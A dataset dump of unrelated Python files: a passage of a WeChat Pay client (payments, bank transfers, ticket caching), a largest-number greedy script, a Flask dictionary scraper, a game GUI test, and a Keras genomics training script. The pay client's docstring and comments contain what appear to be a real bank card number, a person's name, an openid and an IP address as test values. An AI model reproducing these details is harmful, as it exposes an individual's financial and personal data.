获取jssdk ticket。\n :return: 返回的 JSON 数据包\n \"\"\"\n return self.get(\n url=JSTICKET_URI,\n params={\"access_token\": self.token, \"type\": \"jsapi\"}\n )\n\n @property\n def jsticket(self):\n \"\"\"\n 得到jsticket\n \"\"\"\n key_ticket = \"pay_client_jsticket\"\n stream = redis.get(key_ticket)\n\n _jsticket = 0\n _expires_at = 0\n if stream:\n _jsticket, _expires_at = loads(stream)\n\n if _jsticket:\n now = time.time()\n if _expires_at - now > 480:\n logger.info(\"exipres ticket: {}\".format(_expires_at - now))\n return _jsticket\n\n json = self.grant_js_ticket()\n _jsticket = json['ticket']\n js_express = self._now_time + json['expires_in']\n # set\n redis.set(key_ticket, dumps([_jsticket, js_express]))\n return _jsticket\n\n def jsconfig(self, **kwargs):\n \"\"\"\n 得到jsconfig 配置信息\n \"\"\"\n json = {\n \"noncestr\": generate_token(),\n \"jsapi_ticket\": self.jsticket,\n \"timestamp\": self._now_time,\n \"url\": kwargs.pop(\"url\", JSPARAMS_URI)\n }\n # 根据参与签名参数得到签名\n sign_type = 'SHA1'\n sign, _ = get_sign(json, sign_type=sign_type, is_upper=False)\n json['sign'] = sign\n json[\"appid\"] = self.appid\n return json, sign, sign_type\n\n def get_prepay_id_by_unified_pay(self, **package):\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {openid}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package).encode(\"utf-8\")\n\n # 请求统一支付下单接口\n json = self.post(JSPAY_URI, data=xml_data)\n logger.info(\"xml_data: {}\".format(xml_data))\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['prepay_id']\n # 返回正常字符,后面需要拼接\n return \"prepay_id\"\n\n def get_line_url(self, **kw):\n \"\"\"\n 获取线下二维码url\n :return:\n \"\"\"\n kw.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n \"time_stamp\": self._now_time\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kw, pay_sign_key=self.pay_sign_key)\n kw['sign'] = sign\n url = self.line_url.format(**kw)\n return url\n\n def get_prepay_id_by_native_pay(self, **package):\n \"\"\"\n 扫码支付\n 得到二维码code_url\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n {product_id}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package)\n\n\n # 请求统一支付下单接口\n json = self.post(JSPAY_URI, data=xml_data.encode(\"utf-8\").decode(\"latin1\"))\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['prepay_id'], json['code_url']\n # 返回正常字符,后面需要拼接\n return \"prepay_id\", \"\"\n\n def get_line_scan_callback_xml(self, **kw):\n \"\"\"\n 组织线下支付回调返回prepay_id xml数据\n \"\"\"\n xml_data = \"\"\"\n {return_code}\n {result_code}\n {appid}\n {mch_id}\n \n \n \n \n \"\"\"\n kw.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kw, pay_sign_key=self.pay_sign_key)\n kw['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**kw)\n \n\n return xml_data\n\n def orderquery(self, **package):\n \"\"\"\n 订单查询\n 返回订单支付状态\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n {mch_id}\n {nonce_str}\n {out_trade_no}\n \n \n \"\"\"\n package.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(package, pay_sign_key=self.pay_sign_key)\n package['sign'] = sign\n # 转换xml数据\n xml_data = xml_data.format(**package)\n\n json = self.post(ORDER_QUERY, data=xml_data)\n if json[\"return_code\"] == \"SUCCESS\" and json['result_code'] == \"SUCCESS\":\n return json['trade_state'], json\n return 0, {}\n\n def out_trade_no(self, pid):\n _out_trade_no = str(time.time()).replace(\".\", \"\") + str(pid)\n return _out_trade_no[:20]\n\n def js_pay_package(self, **kwargs):\n \"\"\"\n chooseWXPay 参数\n timestamp: {{ wxpay.timestamp }}, // 参与签名key为timeStamp,必须与wxconfig中的时间戳一致\n nonceStr: '{{ wxpay.nonceStr }}', // 支付签名随机串,不长于 32 位\n package: '{{ wxpay.package }}', // 统一支付接口返回的prepay_id参数值,提交格式如:prepay_id=***)\n signType: '{{ wxpay.signType }}', // 签名方式,默认为'SHA1',使用新版支付需传入'MD5'\n \"\"\"\n # 更新默认参与签名参数\n kwargs.update({\n \"appId\": self.appid,\n \"nonceStr\": generate_token(),\n \"signType\": \"MD5\"\n })\n # 根据参与签名参数得到签名\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['paySign'] = sign\n return kwargs\n\n def wap_h5_pay(self, **kwargs):\n \"\"\"\n H5支付\n \"\"\"\n xml_data = \"\"\"\n \n {appid}\n \n {mch_id}\n {nonce_str}\n {notify_url}\n {out_trade_no}\n {spbill_create_ip}\n {total_fee}\n {trade_type}\n {scene_info}\n \n \n \"\"\"\n wap_url = kwargs.pop(\"wap_url\", \"\")\n wap_name = kwargs.pop(\"wap_name\", \"\")\n scene_info = {\n \"h5_info\": {\n \"type\": \"Wap\",\n \"wap_url\": wap_url,\n \"wap_name\": wap_name\n }\n }\n kwargs['scene_info'] = json_pkg.dumps(scene_info)\n # 更新默认参与签名参数\n kwargs.update({\n \"appid\": self.appid,\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n \"trade_type\": \"MWEB\"\n })\n logger.info(\"sign before kwargs: {}\".format(kwargs))\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n logger.info(\"sign after kwargs: {}\".format(kwargs))\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n json = self.post(JSPAY_URI, data=xml_data)\n logger.info(\"wechat response json data: {}\".format(json))\n return json\n\n def pay_to_bank(self, **kwargs):\n \"\"\"\n 企业付款到银行卡\n kwargs['amount'] = 1\n kwargs['bank_code'] = 1002\n kwargs['bank_note'] = 'test'\n kwargs['desc'] = 'test'\n kwargs['bank_no'] = '6212261001014506692'\n kwargs['true_name'] = '向进'\n kwargs['partner_trade_no'] = str(self._now_time)\n \"\"\"\n xml_data = \"\"\"\n \n {amount}\n {bank_code}\n {bank_note}\n {desc}\n {enc_bank_no}\n {enc_true_name}\n {mch_id}\n {nonce_str}\n {partner_trade_no}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n \n bank_no = kwargs.pop(\"bank_no\", None)\n true_name = kwargs.pop(\"true_name\", None)\n if not (bank_no and true_name):\n raise PayException(\"bank_no and true_name is required\")\n\n # enc_bank_no, enc_true_name 加密\n enc_bank_no = self.signature(bank_no)\n enc_true_name = self.signature(true_name)\n\n kwargs['enc_bank_no'] = enc_bank_no\n kwargs['enc_true_name'] = enc_true_name\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n logger.info(\"请求提现到银行卡的参数:{}\".format(kwargs))\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n\n json = self.post(PAY_BANK_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n result_code = json.get(\"result_code\")\n # SYSTEMERROR, INVALID_REQUEST 微信系统错误,需要使用原请求参数进行重试\n # if result_code in (\"SYSTEMERROR\", \"INVALID_REQUEST\"):\n # del kwargs['sign']\n # self.pay_to_bank(**kwargs)\n\n return json\n\n def query_bank(self, **kwargs):\n \"\"\"\n 查询企业付款银行卡\n \"\"\"\n xml_data = \"\"\"\n \n {mch_id}\n {nonce_str}\n {partner_trade_no}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n xml_data = xml_data.format(**kwargs)\n\n\n json = self.post(QUERY_BANK_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n return json\n\n def promotion_transfers(self, **kwargs):\n \"\"\"\n 提现到零钱\n \"\"\"\n xml_data = \"\"\"\n \n {mch_appid}\n {mchid}\n {nonce_str}\n {partner_trade_no}\n {openid}\n {check_name}\n {re_user_name}\n {amount}\n {desc}\n {spbill_create_ip}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"mch_appid\": self.appid,\n \"mchid\": self.partner_id,\n \"nonce_str\": generate_token(),\n })\n\n # kwargs['partner_trade_no'] = str(self._now_time)\n # kwargs['openid'] = 'oANoEwGS99wH34zfu-dYaCzoV0cM'\n # kwargs['check_name'] = 'NO_CHECK'\n # kwargs['re_user_name'] = '向进'\n # kwargs['amount'] = 100\n # kwargs['desc'] = 'desc'\n # kwargs['spbill_create_ip'] = '139.227.252.215'\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n logger.info(\"Wechat Pay Arguments: {}\".format(kwargs))\n\n xml_data = xml_data.format(**kwargs).encode(\"utf-8\")\n\n json = self.post(PROMOTION_TRANSFERS_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n\n result_code = json.get(\"result_code\")\n if result_code == \"FAIL\":\n err_code = json.get(\"err_code\")\n if err_code in (\"SYSTEMERROR\", \"INVALID_REQUEST\"):\n # 使用原订单号请求\n del kwargs['sign']\n self.promotion_transfers(**kwargs)\n\n return json\n\n def get_transfer_info(self, **kwargs):\n \"\"\"\n 查询企业付款到零钱\n \"\"\"\n xml_data = \"\"\"\n \n \n \n \n \n \n \n \"\"\"\n\n kwargs.update({\n \"mch_id\": self.partner_id,\n \"appid\": self.appid,\n \"nonce_str\": generate_token()\n })\n\n sign, _ = get_sign(kwargs, pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n\n json = self.post(QUERY_TRANSFER_INFO_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n return json\n\n def get_public_key(self, **kwargs):\n \"\"\"\n 获取企业支付PKCS 银行账户名,账户加密公钥\n \"\"\"\n xml_data = \"\"\"\n \n {mch_id}\n {nonce_str}\n {sign_type}\n {sign}\n \n \"\"\"\n kwargs.update({\n \"nonce_str\": generate_token(),\n \"mch_id\": self.partner_id,\n \"sign_type\": \"MD5\"\n })\n\n sign, _ = get_sign(kwargs, sign_type=\"MD5\", pay_sign_key=self.pay_sign_key)\n kwargs['sign'] = sign\n\n xml_data = xml_data.format(**kwargs)\n\n\n json = self.post(PUBLIC_KEY_URI, data=xml_data, cert=(APICLIENT_CERT, APICLIENT_KEY), verify=True)\n\n return_code = json.get('return_code')\n if return_code == 'SUCCESS':\n public_key = json.get(\"pub_key\")\n # wirte public key to file\n with open(PUBLIC_PEM, 'w') as pem:\n pem.write(public_key)\n return json\n\ntry:\n pay_client = PayClient(settings.WECHAT_APP_ID, settings.WECHAT_APP_SECRET)\nexcept NameError:\n pay_client\n","sub_path":"weixin/pay_client.py","file_name":"pay_client.py","file_ext":"py","file_size_in_byte":21975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466870554","text":"#Uses python3\n\nimport sys\n\ndef flatten(result):\n res = \"\"\n for i in result:\n res+=i\n return res\n\ndef Is_Greater_Or_Equal(digit, max_digit):\n return int(str(digit) + str(max_digit)) >= int(str(max_digit) + str(digit))\n\ndef largest_number(num_list):\n result = []\n while num_list != []:\n max_digit = 0\n for digit in num_list:\n if Is_Greater_Or_Equal(digit, max_digit):\n max_digit = digit\n result.append(max_digit)\n num_list.remove(max_digit)\n final_result = flatten(result)\n return final_result\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = input.split()\n a = data[1:]\n print(largest_number(a))\n","sub_path":"Greedy Algorithms/largest_number.py","file_name":"largest_number.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"131003937","text":"from flask import Flask, render_template, request, url_for, redirect\nfrom pyquery import PyQuery as pq\n\napp = Flask(__name__)\n\ndef get_search_results(query):\n d = pq(url='http://slovarji.najdi.si/najdi/%s' % query)\n a = d('#contentDict')\n a('a').attr('onclick', '')\n a('.dict_search_more_pons').remove()\n a('.dict_source').remove()\n a('.dict_title_wrapp').remove()\n return a.html().replace(' ', '')\n\n@app.route('/')\ndef index():\n if 'q' in request.args:\n return redirect(url_for('search', query=request.args['q']))\n\n return render_template('index.html')\n\n@app.route('/najdi/')\ndef search(query=None):\n results = ''\n\n if query:\n results = get_search_results(query)\n\n return render_template('index.html', query=query, results=results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494429230","text":"from single_player.client import TractorClient\nimport pygame\n\nmy_client = TractorClient(True)\n\ntest_hand = list(my_client.deck_dict.keys())[:25]\ntest_played = list(my_client.deck_dict.keys())[25:27]\ntest_data = []\nfor i in range(4):\n test_data += [i, test_hand, test_played]\ntest_data += ['True', 'True', 'True', 'test_score', 'test_suit', '1']\nmy_client.set_data(test_data)\n\nwhile True:\n for event in pygame.event.get():\n # quit if the quit button was pressed\n if event.type == pygame.QUIT:\n exit()\n elif event.type == pygame.MOUSEBUTTONUP:\n print(event.pos)\n elif event.type == pygame.KEYUP:\n print(event.key)\n my_client.update(True)","sub_path":"single_player/gui_test.py","file_name":"gui_test.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"57411308","text":"import argparse\nimport numpy as np\nimport pickle\nimport os\nimport sys\nos.environ['KERAS_BACKEND'] = 'tensorflow'\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Conv2D\nimport matplotlib.gridspec as gridspec\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import MaxPooling2D\nfrom keras.callbacks import ModelCheckpoint, EarlyStopping, Callback\nimport sklearn\nfrom keras.regularizers import l2,l1\nfrom keras.layers import *\nfrom sklearn.metrics import hamming_loss,label_ranking_loss,confusion_matrix, auc,roc_curve,roc_auc_score, precision_recall_curve\nfrom keras.optimizers import SGD\nfrom keras.layers.merge import concatenate\nfrom keras.losses import binary_crossentropy\nfrom keras import optimizers,losses,metrics\nfrom sklearn import metrics as met\nimport keras.backend as K\nimport keras.backend.tensorflow_backend as tfb\nfrom skmultilearn.utils import measure_per_label\nimport sklearn.metrics as skm\nimport tensorflow as tf\n# from tensorflow_addons.metrics import HammingLoss\nimport scipy\nfrom numpy import asarray\nfrom numpy import ones\nfrom sklearn.metrics import fbeta_score\nfrom sklearn import svm\nimport matplotlib\nmatplotlib.use('TkAgg')\nfrom matplotlib import pyplot\nglobalArr= [[],[],[],[],[],[],[],[]]\nf_globalArr= [[],[],[],[],[],[],[],[]]\nhighest_roc = (-sys.maxsize - 1,0,0)\nhighest_prc = (-sys.maxsize - 1,0,0)\nhighest_accuracy = -sys.maxsize - 1\nextension='single'\n\nclass Metrics(Callback):\n def on_epoch_end(self, batch, logs={}):\n predValid = self.model.predict_proba(self.validation_data[0])\n pred_binary = K.round(predValid)\n Yvalid = self.validation_data[1]\n file = open(\"output-\"+extension+\".txt\", \"w\")\n file.write('Epoch :'+str(batch))\n for i in range(50):\n temp = np.array_str(np.array([pred_binary[i,:],Yvalid[i,:].astype(int)]))\n file.write(temp)\n file.write('\\n--------------\\n')\n self.acc_per_label = measure_per_label(skm.accuracy_score, scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(pred_binary))\n self.f_score = measure_per_label(my_fbeta, scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(pred_binary))\n # self.prc_by_label = measure_per_label(skm.auc(skm.precision_recall_curve[0],skm.precision_recall_curve[1]), scipy.sparse.csr_matrix(Yvalid),scipy.sparse.csr_matrix(predValid.round()))\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(Yvalid.shape[1]):\n fpr[i], tpr[i], _ = roc_curve(Yvalid[:, i], pred_binary[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n global roc_triplet\n roc_triplet = (roc_auc,fpr,tpr)\n self.auc_per_label = roc_auc\n\n prec = dict()\n recall = dict()\n prc_auc = dict()\n for i in range(Yvalid.shape[1]):\n prec[i], recall[i], _ = precision_recall_curve(Yvalid[:, i], pred_binary[:, i])\n prc_auc[i] = auc(recall[i], prec[i])\n global prc_triplet\n prc_triplet = (prc_auc,recall,prec)\n self.prc_per_label = prc_auc\n\n # confusion csr_matrix\n print(\"Confusion matrix: \" ,skm.confusion_matrix(Yvalid, pred_binary))\n\n # print(\"Per label auc:\",self.auc_per_label)\n # print(\"Per label prc:\",self.prc_per_label)\n print(\"Per label accuracy:\",self.acc_per_label)\n try:\n for i in range(8):\n globalArr[i].append(self.acc_per_label[i])\n f_globalArr[i].append(self.f_score[i])\n except:\n print(\"Single label scenario\")\n f_globalArr[0].append(self.f_score) # my fbeta function is faulty\n print(\"Per label f2 score:\",self.f_score)\n global highest_accuracy\n if logs.get('val_accuracy') > highest_accuracy:\n highest_accuracy = logs.get('val_accuracy')\n\n return\n\n\n\ndef calculating_class_weights(y_true):\n from sklearn.utils.class_weight import compute_class_weight,compute_sample_weight\n number_dim = np.shape(y_true)[1]\n weights = np.empty([number_dim, 2])\n for i in range(number_dim):\n weights[i] = compute_class_weight('balanced', np.unique(y_true[:, i]), y_true[:, i])\n return weights\n\ndef get_model(numLabels, numConvLayers, numConvFilters, poolingDropout, learningRate, momentum, length):\n model = Sequential()\n conv1_layer = Conv1D(filters=1000,\n kernel_size=8,\n input_shape=(length, 4),\n padding=\"valid\",\n activation=\"relu\",\n # use_bias=True, kernel_regularizer=l2(0.001))\n use_bias=True)\n model.add(conv1_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n convn_layer = Conv1D(padding=\"valid\",\n activation=\"relu\",\n kernel_size=4,\n filters=500,\n use_bias=True, kernel_regularizer=l2(0.001))\n # use_bias=True)\n model.add(convn_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n convn_layer = Conv1D(padding=\"valid\",\n activation=\"relu\",\n kernel_size=4,\n filters=250,\n use_bias=True, kernel_regularizer=l2(0.001))\n # use_bias=True)\n model.add(convn_layer)\n model.add(MaxPooling1D(pool_size=4))\n model.add(Dropout(0.2))\n\n model.add(Flatten())\n model.add(Dense(units=numLabels, use_bias=True, kernel_regularizer=l2(0.001)))\n model.add(Activation('sigmoid'))\n return model\n\n# plot diagnostic learning curves\ndef summarize_diagnostics(history):\n gs = gridspec.GridSpec(3, 2)\n\n fig = pyplot.figure()\n # plot loss\n ax1=pyplot.subplot(gs[0, :])\n ax1.title.set_text('Cross Entropy Loss')\n ax1.plot(history.history['loss'], color='blue', label='train')\n ax1.plot(history.history['val_loss'], color='orange', label='test')\n ax1.set_yticks(np.arange(0, 1.2, step=0.2))\n\n\t# # plot fbeta\n # ax2 = pyplot.subplot(411)\n # ax2.title.set_text('Fbeta')\n # if extension!='single':\n # for i in range(8):\n # ax2.plot(f_globalArr[i], label='mine')\n # ax2.legend(\n # ['Progenitor','Dendritic','Monocyte','B cell','Basophil','NK cell','CD4+','CD8+'],loc='lower left', ncol=2)\n # # else:\n # # ax2.plot(f_globalArr[0], label='sklearn')\n # ax2.plot(history.history['fbeta'], color='blue', label='train')\n # ax2.plot(history.history['val_fbeta'], color='orange', label='test')\n # ax2.set_yticks(np.arange(0, 1.2, step=0.2))\n\n #plot accuracy\n ax3=pyplot.subplot(gs[1, :])\n ax3.title.set_text('Accuracy')\n if extension!='single':\n for i in range(8):\n ax3.plot(globalArr[i], label='mine')\n ax3.legend(['Progenitor','Dendritic','Monocyte','B cell','Basophil','NK cell','CD4+','CD8+'],loc='lower left', ncol=2)\n ax3.plot(history.history['accuracy'], label='train')\n ax3.plot(history.history['val_accuracy'], label='test')\n ax3.set_yticks(np.arange(0, 1.2, step=0.2))\n\n #Plot auroc\n ax4=pyplot.subplot(gs[2, 0])\n if extension!='single':\n for i in range(8):\n ax4.plot(roc_triplet[1][i],roc_triplet[2][i],label='ROC curve (area = %0.2f)' % roc_triplet[0][i])\n else:\n ax4.plot(roc_triplet[1][0],roc_triplet[2][0],label='ROC curve (area = %0.2f)' % roc_triplet[0][0])\n ax4.set_yticks(np.arange(0, 1.25, step=0.2))\n ax4.set_xticks(np.arange(0, 1.2, step=0.2))\n ax4.legend(loc=\"lower right\")\n\n #Plot auprc\n ax5=pyplot.subplot(gs[2, 1])\n if extension!='single':\n for i in range(8):\n ax5.plot(prc_triplet[1][i],prc_triplet[2][i],label='PRC curve (area = %0.2f)' % prc_triplet[0][i])\n else:\n ax5.plot(prc_triplet[1][0],prc_triplet[2][0],label='PRC curve (area = %0.2f)' % prc_triplet[0][0])\n ax5.set_yticks(np.arange(0, 1.25, step=0.2))\n ax5.set_xticks(np.arange(0, 1.2, step=0.2))\n ax5.legend(loc=\"lower right\")\n\n # save plot to file\n fig.tight_layout()\n fig.savefig('my_plot-new-' + extension+'.png')\n pyplot.close()\n\ndef train_model(modelOut,\n X_train,\n Y_train,\n X_valid,\n Y_valid,\n batchSize,\n numEpochs,\n numConvLayers,\n numConvFilters,\n poolingDropout,\n learningRate,\n momentum,\n length,\n pretrainedModel):\n\n # class_weights = calculating_class_weights(Y_train)\n # print(class_weights)\n\n # numLabels=1\n try:\n numLabels = Y_train.shape[1]\n except:\n numLabels= 1\n # X_train = np.reshape(X_train, (X_train.shape[0],1,X_train.shape[1],X_train.shape[2]))\n # X_valid = np.reshape(X_valid, (X_valid.shape[0],1,X_valid.shape[1],X_valid.shape[2]))\n if pretrainedModel:\n model = load_model(pretrainedModel)\n else:\n model = get_model(numLabels, numConvLayers, numConvFilters, poolingDropout, learningRate, momentum, length)\n optim = SGD(lr=learningRate, momentum=momentum)\n #'binary_crossentropy' get_weighted_loss(class_weights)\n model.compile(loss='binary_crossentropy', optimizer=optim, metrics=['accuracy'])#,fbeta]), ranking_loss]) #specificity_metric])\n model.summary()\n checkpointer = ModelCheckpoint(filepath=modelOut,\n verbose=1, save_best_only=True, monitor='val_loss', mode='min')\n earlystopper = EarlyStopping(patience=10, monitor='val_accuracy', min_delta=0, verbose=0, mode='max')\n print(X_valid.shape)\n print(Y_valid.shape)\n cust_metrics = Metrics()\n history = model.fit(x=X_train, y=Y_train, batch_size=batchSize, epochs=numEpochs, shuffle=True, verbose=1,\n validation_data = (X_valid, Y_valid), initial_epoch=0, callbacks=[checkpointer,cust_metrics, earlystopper])#, class_weight = classWeights)\n # from skmultilearn.problem_transform import BinaryRelevance\n # from skmultilearn.ext import Keras\n # KERAS_PARAMS = dict(batch_size=batchSize, epochs=numEpochs, shuffle=True, verbose=1,\n # validation_data = (X_valid, Y_valid), initial_epoch=0, callbacks=[checkpointer,cust_metrics])\n # clf = BinaryRelevance(classifier=Keras(model, False, KERAS_PARAMS), require_dense=[False,True])\n # history = clf.fit(X_train, Y_train)\n # learning curves\n summarize_diagnostics(history)\n\ndef my_fbeta(y_true, y_pred):\n return fbeta_score(y_true, y_pred,2)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(description='Train a convolutional neural networnp model', fromfile_prefix_chars='@')\n parser.add_argument('-xt', '--xtrain', help='npy file containing training data', required=True)\n parser.add_argument('-yt', '--ytrain', help='npy file containing training labels', required=True)\n parser.add_argument('-xv', '--xvalid', help='npy file containing validation data', required=True)\n parser.add_argument('-yv', '--yvalid', help='npy file containing validation labels', required=True)\n parser.add_argument('-o', '--model-out', help='hdf5 file path for output', required=True)\n parser.add_argument('-b', '--batch-size', type=int, help='mini-batch size for training', required=False, default=100)\n parser.add_argument('-e', '--num-epochs', type=int, help='number of epochs to train', required=False, default=50)\n parser.add_argument('-n', '--num-conv-layers', type=int, help='number of convolutional layers to use', required=False, default=2)\n parser.add_argument('-c', '--num-conv-filters', type=int, help='number of convolutional filters to use in layers after the first one', required=False, default=100)\n parser.add_argument('-pdrop', '--pool-dropout-rate', type=float, help='dropout rate for pooling layer', required=False, default=0.2)\n parser.add_argument('-lr', '--learning-rate', type=float, help='learning rate for sgd optimizer', required=False, default=0.01)\n parser.add_argument('-m', '--momentum', type=float, help='momentum for sgd', required=False, default=0.9)\n parser.add_argument('-l', '--length', type=int, help='length of input nucleotide sequences', required=False, default=499)\n parser.add_argument('-w', '--pretrained-model', help='path to hdf5 file containing pretrained model', required=False, default=None)\n parser.add_argument('-c1w', '--class-1-weight', type=int, help='weight for positive class during training', required=False, default=1)\n parser.add_argument('-c2w', '--class-2-weight', type=int, help='weight for positive class during training', required=False, default=1)\n args = parser.parse_args()\n print(\"Loading data\")\n X_train = np.load(file=args.xtrain)\n Y_train = np.load(file=args.ytrain)\n\n X_valid = np.load(file=args.xvalid)\n Y_valid = np.load(file=args.yvalid)\n\n # Note no. of samples will be doubled from output of standardizepeaks\n # because of reverse complements\n print(\"Training on: \"+ str(X_train.shape[0]))\n print(\"Validating on: \" + str(X_valid.shape[0]))\n\n # if extension=='single':\n # print(\"Extracting 1 label\")\n # Y_train = Y_train[:,1]\n # Y_valid = Y_valid[:,1]\n\n #\n print('Model state:')\n print('LR='+str(args.learning_rate)+'\\nMomentum='+str(args.momentum))\n #\n #train SVM models\n #use gkm-svm : lsgkm\n # ''' To generate fasta files use:\n # sed '/^chr8/ d' combined.bed | sed '/^chr9/ d' | sed '/^chr4/ d' > training.bed\n # ./bedtools getfasta -fi hg38.fa -bed diff_acess/negSet-2.bed -fo diff_acess/negSet.fa\n # ./bedtools getfasta -fi hg38.fa -bed diff_acess/training.bed -fo diff_acess/posSet.fa '''\n # print(\"Training SVM model\")\n # os.system('/home/snigdhaa/lsgkm/src/gkmtrain -T 16 -s /home/snigdhaa/diff_acess/svmData/prom2pos.fa /home/snigdhaa/diff_acess/svmData/prom2neg.fa svmModel-short')\n\n print(Y_valid.shape)\n test_yhat = asarray([np.zeros(Y_valid.shape[1]) for _ in range(Y_valid.shape[0])])\n print(measure_per_label(skm.accuracy_score, scipy.sparse.csr_matrix(Y_valid),scipy.sparse.csr_matrix(test_yhat)))\n m = tf.keras.metrics.Accuracy()\n _ = m.update_state(Y_valid,test_yhat)\n print(m.result().numpy() )\n\n #Check baseline auroc and auprc for single label\n prec, recall, _ = precision_recall_curve(Y_valid, test_yhat)\n prc_auc = auc(recall, prec)\n print(\"Baseline prc:\"+str(prc_auc))\n\n fpr, tpr, _ = roc_curve(Y_valid, test_yhat)\n roc_auc = auc(fpr, tpr)\n print(\"Baseline roc:\"+str(roc_auc))\n\n train_model(modelOut=args.model_out,\n X_train=X_train,\n Y_train=Y_train,\n X_valid=X_valid,\n Y_valid=Y_valid,\n batchSize=args.batch_size,\n numEpochs=args.num_epochs,\n numConvLayers=args.num_conv_layers,\n numConvFilters=args.num_conv_filters,\n poolingDropout=args.pool_dropout_rate,\n learningRate=args.learning_rate,\n momentum=args.momentum,\n length=args.length,\n pretrainedModel=args.pretrained_model)\n print('Highest accuracy: '+str(highest_accuracy))\n\n model = load_model('output-newDrop.hdf5')\n predValid = model.predict_proba(X_valid)\n pred_binary = K.round(predValid)\n fpr = dict()\n tpr = dict()\n roc_auc = dict()\n for i in range(Y_valid.shape[1]):\n fpr[i], tpr[i], _ = roc_curve(Y_valid[:, i], pred_binary[:, i])\n roc_auc[i] = auc(fpr[i], tpr[i])\n roc_triplet = (roc_auc,fpr,tpr)\n\n prec = dict()\n recall = dict()\n prc_auc = dict()\n for i in range(Y_valid.shape[1]):\n prec[i], recall[i], _ = precision_recall_curve(Y_valid[:, i], pred_binary[:, i])\n prc_auc[i] = auc(recall[i], prec[i])\n prc_triplet = (prc_auc,recall,prec)\n\n gs = gridspec.GridSpec(1, 2)\n\n fig = pyplot.figure()\n #Plot auroc\n ax4=pyplot.subplot(gs[0, 0])\n if extension!='single':\n for i in range(8):\n ax4.plot(roc_triplet[1][i],roc_triplet[2][i],label='ROC curve (area = %0.2f)' % roc_triplet[0][i])\n else:\n ax4.plot(roc_triplet[1][0],roc_triplet[2][0],label='ROC curve (area = %0.2f)' % roc_triplet[0][0])\n ax4.set_yticks(np.arange(0, 1.25, step=0.2))\n ax4.set_xticks(np.arange(0, 1.2, step=0.2))\n ax4.legend(loc=\"lower right\")\n\n #Plot auprc\n ax5=pyplot.subplot(gs[0, 1])\n if extension!='single':\n for i in range(8):\n ax5.plot(prc_triplet[1][i],prc_triplet[2][i],label='PRC curve (area = %0.2f)' % prc_triplet[0][i])\n else:\n ax5.plot(prc_triplet[1][0],prc_triplet[2][0],label='PRC curve (area = %0.2f)' % 